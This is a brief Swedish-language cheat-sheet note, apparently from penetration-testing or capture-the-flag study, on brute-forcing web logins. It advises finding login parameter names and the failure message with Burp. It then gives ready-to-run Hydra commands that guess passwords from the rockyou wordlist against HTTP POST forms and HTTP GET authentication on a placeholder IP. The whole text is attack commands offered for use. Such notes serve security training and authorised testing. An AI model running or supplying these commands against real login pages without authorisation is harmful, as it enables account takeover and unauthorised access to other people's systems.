2. HTTP Login Attack
HTTP-POST Attack:
- Använd Burp för att ta reda på 1. Parameternamnen för inloggningen, och 2. Errortexten vid misslyckad inloggning
- Exempel Hydra:
sudo hydra -l <username> -P /usr/share/wordlists/rockyou.txt <ip> http-post-form "/index.php:user=username&password=^PASS^:Login failed. Invalid"
HTTP-GET Attack:
sudo hydra -l <username> -P /usr/share/wordlists/rockyou.txt -s 80 -f <ip> http-get